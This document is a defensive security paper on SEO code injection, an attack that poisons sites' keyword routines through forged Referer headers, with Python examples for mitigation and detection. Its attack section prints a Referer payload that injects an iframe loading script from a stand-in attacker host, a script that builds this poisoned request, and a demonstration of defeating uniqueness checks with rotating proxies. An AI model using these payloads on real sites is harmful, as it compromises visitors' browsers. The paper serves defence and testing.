Search Engine Optimization Poisoning
Search Engine Optimization (SEO) is a critical component in an organization's ability to be discovered by prospective customers and clients as they conduct online searches for information and products. It is a technique commonly employed by the largest and most sophisticated Internet businesses, and a key component of their online business strategy.
Unfortunately, the nature of SEO algorithms, and the modification of dynamic site content that they promote, means that they can often be manipulated by an attacker. Vulnerable Web applications can be used to propagate infectious code capable of compromising the organization's prospective customers and clients. This brief paper explains the technique referred to as SEO Code Injection or Poisoning, and the steps that may be taken to detect and mitigate the vulnerability.
Unlike standard SEO manipulation, which focuses on manipulating the relative page-rank positioning of results within popular search engines, SEO Code Injection attacks are designed to fool a Web application's backend systems into embedding malicious code within dynamically created page content. In a successful attack, any subsequent request for the targeted page (or related pages on the same site) will result in the attacker's malicious code being included as part of the page content, and that code will likely be executed within the remote user's Web browser during the page rendering process.
While an attacker could attempt to embed almost any kind of malicious code through a vulnerable SEO vector, in most cases the preferred method is to include short code segments that will cause a visitor's Web browser to link to, and execute, more advanced malicious code hosted on external Web servers under the attacker's direct control.
How it Works
In essence, SEO Code Injection is a fairly simple attack that targets Web site visitors by abusing poor application logic and exploiting content sanitization flaws within the backend Web application service.
For an attack to be successful, the Web application must provide three functions: it must extract the search keywords used by visitors to reach the site (typically from the HTTP Referer header); it must track the relative popularity of those keywords across multiple requests; and it must dynamically embed popular keywords within the content of the pages it serves.
While the specific formulation of the attack can take on various forms depending upon the nuances of the vulnerable Web application itself, the process of conducting an attack is typically straightforward. The description below explains the most common vectors used in attacks conducted in the first half of 2008.

A. Crafted Referer Submission. The attacker constructs an HTTP request that appears to originate from a search engine results page, embedding malicious HTML within the apparent search keywords of the Referer header:
GET /target_page.php HTTP/1.0
Referer: http://www.google.com/search?hl=en&q=XSS+%3E%3Ciframe+src%3D%2F%2Fattack.org%2Fbad.js%3E
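A forged request of this kind can be generated programmatically. The following is a minimal Python sketch; the target page and attacker domain are the illustrative values from the example request above, not real infrastructure:

```python
from urllib.parse import quote_plus

# Illustrative values taken from the example request above.
TARGET_PAGE = '/target_page.php'
PAYLOAD = 'XSS ><iframe src=//attack.org/bad.js>'

def build_poisoned_request(page: str, payload: str) -> str:
    """Build a raw HTTP/1.0 request whose Referer mimics a Google search
    results page, smuggling the payload in as the apparent search keywords."""
    fake_referer = 'http://www.google.com/search?hl=en&q=' + quote_plus(payload)
    return 'GET %s HTTP/1.0\r\nReferer: %s\r\n\r\n' % (page, fake_referer)

print(build_poisoned_request(TARGET_PAGE, PAYLOAD))
```

URL encoding (quote_plus) renders the HTML metacharacters exactly as they appear in the example header, which is why naive keyword extraction routines that decode the query string recover the raw markup.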
B. Distributed Submission. While it may be possible for a would-be attacker to repeatedly type their malicious keyword payloads into the search engine, almost all SEO Code Injection attacks are conducted using automated tools. Once an HTTP request packet has been created, it can be repeatedly sent using any number of tools and scripts, or it may be farmed out to a botnet.
Some Web application SEO routines check additional submission data for uniqueness of the page request (e.g. cookies, IP address, etc.), but these checks can be easily overcome with a small degree of additional automation and the use of distributed botnets or proxies.
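The weakness of such uniqueness checks can be illustrated with a small simulation. The sketch below models a server-side routine that counts each (IP, cookie) pair only once; an attacker rotating through a handful of hypothetical proxy addresses and minting a fresh cookie per request passes the check every time:

```python
import itertools

# Model of a naive SEO uniqueness check: each (ip, cookie) pair is counted
# once, so rotating either value inflates the apparent keyword popularity.
seen = set()
keyword_count = 0

def record_search(ip: str, cookie: str) -> None:
    """Count a keyword submission only once per apparently-unique visitor."""
    global keyword_count
    if (ip, cookie) not in seen:
        seen.add((ip, cookie))
        keyword_count += 1

# Hypothetical proxy/botnet addresses (documentation range 203.0.113.0/24).
proxies = ['203.0.113.%d' % i for i in range(5)]
for i, ip in enumerate(itertools.islice(itertools.cycle(proxies), 50)):
    record_search(ip, cookie='session-%d' % i)  # fresh cookie each request

print(keyword_count)  # all 50 submissions counted as "unique" visitors
```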
It is important to note that the vulnerability being exploited lies within the Web application server's SEO routines, and not with the method by which victims navigated to an infected page. For example, a home user may search for the keywords "XSS Attack" and end up following a link to a page initially infected by an attacker who used different keywords (e.g. "Gunter XSS"). The "legitimate" keywords are irrelevant to the attacker; only the malicious SEO Code Injection content matters.
Mitigation Strategies
To protect against SEO Code Injection attacks, organizations have a number of mitigation strategies they can adopt. While secure development and testing processes are critical, defense in depth through the use of content inspection and filtering technologies can help protect against coding failures and unexpected injection vectors.
A critical component of mitigating the threat of SEO Code Injection attacks is correct input sanitization. Ideally, any user-supplied content should be processed against a white-list of allowable characters prior to its use in search engine optimization or page creation routines. User-supplied data not covered by the white-list should be automatically dropped. In particular, user-supplied HTML code characters (and their myriad encoded forms) should never be embedded within page content unless specifically authorized, and their context fully understood by the application developer; even then, professional security advice should be sought. In almost all cases, characters outside the ASCII alphanumeric range should never be used in search optimization routines.
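A white-list sanitizer of this kind can be very small. The sketch below is illustrative rather than prescriptive: the allowed character set (ASCII letters, digits, spaces and hyphens) is an assumption that each application would tune to its own keyword requirements:

```python
import re

# White-list sanitizer: only ASCII letters, digits, spaces and hyphens
# survive; everything else (HTML metacharacters, their encoded forms once
# decoded, etc.) is dropped outright rather than escaped.
ALLOWED = re.compile(r'[A-Za-z0-9 \-]')

def sanitize_keywords(raw: str) -> str:
    return ''.join(ch for ch in raw if ALLOWED.match(ch))

print(sanitize_keywords('XSS ><iframe src=//attack.org/bad.js>'))
```

Note that dropping disallowed characters (rather than attempting to escape or black-list them) sidesteps the problem of the many alternative encodings an attacker can use to smuggle markup past a filter.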
Since many SEO Code Injection attack attempts will likely be automated, application developers should consider the use of anti-automation mitigation strategies. These could consist of temporal anomaly detection routines (e.g. flagging inconsistent bursts of network traffic), the use of submission source IP address information to identify uniqueness, and perhaps bad-IP lookups (e.g. whether the source IP addresses are known botnet agents, or located within heavily botnet-saturated netblocks).
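A simple temporal anomaly check can be sketched as a sliding-window burst detector. The window size and threshold below are arbitrary values chosen for illustration, not recommended production settings:

```python
from collections import deque

WINDOW = 60.0    # seconds of history to keep per source IP (assumption)
THRESHOLD = 10   # requests within the window before flagging (assumption)

class BurstDetector:
    """Flag a source IP that submits more than THRESHOLD keyword
    requests within WINDOW seconds."""

    def __init__(self):
        self.hits = {}  # ip -> deque of request timestamps

    def is_suspicious(self, ip: str, now: float) -> bool:
        q = self.hits.setdefault(ip, deque())
        q.append(now)
        while q and now - q[0] > WINDOW:
            q.popleft()          # discard timestamps outside the window
        return len(q) > THRESHOLD

det = BurstDetector()
# A burst of 20 requests in 20 seconds from one IP trips the detector.
flags = [det.is_suspicious('198.51.100.7', float(t)) for t in range(20)]
print(flags[0], flags[-1])
```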
Given the nature and construction of the actual malicious content (e.g. iframe, script, URL, etc.), and its placement within the HTTP page request (e.g. the HTTP Referer header, GET parameters, etc.), many perimeter and Web application protection systems are capable of identifying it.
Intrusion Prevention Systems (IPS) that can deep-inspect HTTP headers and identify cross-site scripting, SQL injection and other HTML code injection string formulations can stop this malicious inbound content from making its way to the Web application server, thereby protecting any vulnerable SEO routines from attack and subsequent manipulation.
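The spirit of such signature-based header inspection can be shown with a toy filter: decode the Referer and search for common injection fragments before the request ever reaches the application's SEO routines. The pattern set below is deliberately small and illustrative; real IPS signatures are far more extensive:

```python
import re
from urllib.parse import unquote_plus

# A small, illustrative signature set for common HTML/script injection
# fragments; a production IPS would carry far more patterns and decodings.
INJECTION_PATTERNS = re.compile(
    r'(<\s*(iframe|script|img|object)\b|javascript:|on\w+\s*=)',
    re.IGNORECASE,
)

def referer_is_malicious(referer: str) -> bool:
    decoded = unquote_plus(referer)  # normalize URL encoding first
    return bool(INJECTION_PATTERNS.search(decoded))

print(referer_is_malicious(
    'http://www.google.com/search?hl=en&q='
    'XSS+%3E%3Ciframe+src%3D%2F%2Fattack.org%2Fbad.js%3E'
))
```

Decoding before matching matters: the example attack header carries its iframe entirely in URL-encoded form, which a filter operating on the raw header bytes would miss.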
Content filtering technologies (e.g. perimeter URL filtering) can often be used to identify the inclusion of URLs previously known to host malicious content. When complementing Web proxy technologies, they can prevent end-users from navigating to malicious links that happen to be embedded within a Web site affected by an SEO Code Injection vulnerability.
Detecting the Vulnerability
Uncovering whether a Web application is vulnerable to SEO Code Injection is not a trivial task. As with all second-order code injection attack formats, testing for its presence typically cannot be done by sending a single request and does not result in an immediately verifiable response, meaning that standard code injection testing methodologies may fail to detect vulnerable vectors.
Current generation code auditing suites can sometimes be used to perform a static analysis review of Web application source code. Depending upon the language the application has been written in, and the level of access granted to the source code, some tools are capable of detecting probable SEO Code Injection flaws. However, since the attack vector is relatively new, and SEO routines themselves are constantly evolving, static analysis code auditing tools for Web applications still have some way to mature and will probably require a high degree of manual tuning.
Many commercial Web application vulnerability scanners are capable of manipulating HTTP header fields and identifying places within a vulnerable application that incorrectly sanitize data. However, sophisticated SEO routines which require thresholds to be met before triggering page content modification will likely go undetected unless the application vulnerability scanner is specifically configured to repeat tests until they exceed the threshold.
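The threshold problem can be made concrete with a small model. The sketch below simulates a vulnerable, threshold-gated SEO routine (the threshold value and page-assembly logic are assumptions for illustration) and shows why a single-shot scanner probe sees nothing while a repeated test exposes the flaw:

```python
# Model of a threshold-gated, unsanitized SEO routine (the vulnerable
# behavior under test); THRESHOLD is an assumption for the sketch.
THRESHOLD = 5
keyword_hits = {}

def record_keyword(keyword: str) -> None:
    keyword_hits[keyword] = keyword_hits.get(keyword, 0) + 1

def render_page() -> str:
    """Embed any keyword that has crossed the popularity threshold,
    without sanitization."""
    popular = [k for k, n in keyword_hits.items() if n >= THRESHOLD]
    return '<html><body>Popular searches: %s</body></html>' % ', '.join(popular)

payload = '<iframe src=//attack.org/bad.js>'

# A single probe -- the standard scanner behavior -- sees nothing...
record_keyword(payload)
single_shot = payload in render_page()

# ...but repeating the submission past the threshold exposes the flaw.
for _ in range(THRESHOLD):
    record_keyword(payload)
repeated = payload in render_page()

print(single_shot, repeated)  # False True
```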
Web application penetration testing methodologies need to encompass tests for identifying likely SEO Code Injection vulnerabilities and vectors. Ideally, testing should include: manipulation of the HTTP header fields (in particular the Referer) consumed by the application's SEO routines; repeated submission of identical keyword payloads, sufficient to exceed any popularity thresholds; and subsequent re-inspection of dynamically generated pages for evidence of second-order code injection.
Conclusions
2008 saw the birth of the threat now known as SEO Code Injection or Poisoning. As SEO routines mature and adapt to changes in Internet search page-ranking systems, organizations will continue to be exposed to new threats and attack vectors that exploit weaknesses in them.
Given the complexity in the way SEO routines function, in particular the algorithms behind repetitive keyword ranking, the process for detecting the presence of exploitable flaws in a Web application is more involved, and newer methodologies are required in order to detect SEO Code Injection vulnerabilities.